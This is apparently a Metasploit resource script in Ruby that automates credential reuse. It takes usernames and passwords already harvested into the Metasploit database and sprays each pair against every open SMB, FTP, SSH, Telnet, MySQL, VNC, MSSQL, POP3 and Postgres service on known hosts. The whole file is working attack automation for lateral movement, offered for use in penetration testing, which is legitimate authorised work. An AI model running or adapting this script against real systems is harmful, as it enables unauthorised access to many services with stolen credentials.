# auto-cred-checker.rc # Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de) # This Metasploit RC-File could be used to automatically check already discovered # credentials against some other login services. # It uses allready discovered credential from the database and tries to use them against some # other services #we look in the global datastore for a global VERBOSE option and use it if (framework.datastore['VERBOSE'] == "true") verbose = 1 #true else verbose = 0 end # Test and see if we have a database connected begin framework.db.hosts rescue ::ActiveRecord::ConnectionNotEstablished print_error("Database connection isn't established") return end def jobwaiting(verbose) maxjobs=15 #throtteling if we get too much jobs while(framework.jobs.keys.length >= maxjobs) ::IO.select(nil, nil, nil, 2.5) if (verbose == 1) print_error("waiting for finishing some modules... active jobs: #{framework.jobs.keys.length} / threads: #{framework.threads.length}") end end end def infos(serv,creds,host) print_line("") print_line("====================================") print_line("IP: #{host.address}") print_line("OS: #{host.os_name}") print_line("Servicename: #{serv.name}") print_line("Service Port: #{serv.port.to_i}") print_line("Service Protocol: #{serv.proto}") print_line("User: #{creds.user}") print_line("Pass: #{creds.pass}") print_line("====================================") print_line("") end framework.db.creds.each do |creds| # ... we do not check windows hashes ... have a look at auto_pass_the_hash.rc next if ( creds.ptype == "smb_hash" ) password = creds.pass username = creds.user framework.db.hosts.each do |host| host.services.each do |serv| next if not serv.host next if (serv.state != Msf::ServiceState::Open) # for now we only check these services, you can add some more ... next if not (serv.name =~ /smb/ or serv.name =~ /microsoft-ds/ or serv.name =~ /netbios-ssn/ or serv.name =~ /ftp/ or serv.name =~ /ssh/ or serv.name =~ /telnet/ or serv.name =~ /mysql/ or serv.name =~ /vnc/ or serv.name =~ /mssql/ or serv.name =~ /pop3/ or serv.name =~ /postgres/) xport = serv.port.to_i xprot = serv.proto xname = serv.name xhost = host.address if(xname =~ /smb/ or xname =~ /microsoft-ds/ or xname =~ /netbios-ssn/) print_line("smb_login") if(verbose == 1) infos(serv,creds,host) end run_single("use auxiliary/scanner/smb/smb_login") run_single("set RHOSTS #{xhost}") run_single("set RPORT #{xport}") run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this run_single("set SMBUser #{username}") run_single("set SMBPass #{password}") if(verbose == 1) run_single("set VERBOSE true") run_single("run -j") else run_single("run -j -q") end jobwaiting(verbose) run_single("back") elsif (xname =~ /ftp/) print_line("ftp_login") if(verbose == 1) infos(serv,creds,host) end run_single("use auxiliary/scanner/ftp/ftp_login") run_single("set RHOSTS #{xhost}") run_single("set RPORT #{xport}") run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this run_single("set USERNAME #{username}") run_single("set PASSWORD #{password}") if(verbose == 1) run_single("set VERBOSE true") run_single("run -j") else run_single("run -j -q") end jobwaiting(verbose) run_single("back") elsif(xname =~ /ssh/) print_line("ssh_login") if(verbose == 1) infos(serv,creds,host) end run_single("use auxiliary/scanner/ssh/ssh_login") run_single("set RHOSTS #{xhost}") run_single("set RPORT #{xport}") run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this run_single("set USERNAME #{username}") run_single("set PASSWORD #{password}") if(verbose == 1) run_single("set VERBOSE true") run_single("run -j") else run_single("run -j -q") end jobwaiting(verbose) run_single("back") elsif(xname =~ /telnet/) print_line("telnet_login") if(verbose == 1) infos(serv,creds,host) end run_single("use auxiliary/scanner/telnet/telnet_login") run_single("set RHOSTS #{xhost}") run_single("set RPORT #{xport}") run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this run_single("set USERNAME #{username}") run_single("set PASSWORD #{password}") if(verbose == 1) run_single("set VERBOSE true") run_single("run -j") else run_single("run -j -q") end jobwaiting(verbose) run_single("back") elsif(xname =~ /mysql/) print_line("mysql_login") if(verbose == 1) infos(serv,creds,host) end run_single("use auxiliary/scanner/mysql/mysql_login") run_single("set RHOSTS #{xhost}") run_single("set RPORT #{xport}") run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this run_single("set USERNAME #{username}") run_single("set PASSWORD #{password}") if(verbose == 1) run_single("set VERBOSE true") run_single("run -j") else run_single("run -j -q") end jobwaiting(verbose) run_single("back") elsif(xname =~ /vnc/) print_line("vnc_login") if(verbose == 1) infos(serv,creds,host) end run_single("use auxiliary/scanner/vnc/vnc_login") run_single("set RHOSTS #{xhost}") run_single("set RPORT #{xport}") run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this run_single("set USERNAME #{username}") run_single("set PASSWORD #{password}") if(verbose == 1) run_single("set VERBOSE true") run_single("run -j") else run_single("run -j -q") end jobwaiting(verbose) run_single("back") elsif(xname =~ /mssql/) print_line("mssql_login") if(verbose == 1) infos(serv,creds,host) end run_single("use auxiliary/scanner/mssql/mssql_login") run_single("set RHOSTS #{xhost}") run_single("set RPORT #{xport}") run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this run_single("set USERNAME #{username}") run_single("set PASSWORD #{password}") if(verbose == 1) run_single("set VERBOSE true") run_single("run -j") else run_single("run -j -q") end jobwaiting(verbose) run_single("back") elsif(xname =~ /pop3/) print_line("pop3_login") if(verbose == 1) infos(serv,creds,host) end run_single("use auxiliary/scanner/pop3/pop3_login") run_single("set RHOSTS #{xhost}") run_single("set RPORT #{xport}") run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this run_single("set USERNAME #{username}") run_single("set PASSWORD #{password}") if(verbose == 1) run_single("set VERBOSE true") run_single("run -j") else run_single("run -j -q") end jobwaiting(verbose) run_single("back") elsif (xname =~ /postgres/) print_line("postgres_login") if(verbose == 1) infos(serv,creds,host) end run_single("use auxiliary/scanner/postgres/postgres_login") run_single("set RHOSTS #{xhost}") run_single("set RPORT #{xport}") run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this run_single("unset USERPASS_FILE") # to check just the credentials of the db we have to disable this run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this run_single("set USERNAME #{username}") run_single("set PASSWORD #{password}") if(verbose == 1) run_single("set VERBOSE true") run_single("run -j") else run_single("run -j -q") end jobwaiting(verbose) run_single("back") end end # host.services.each loop end # framework.db.hosts.each loop end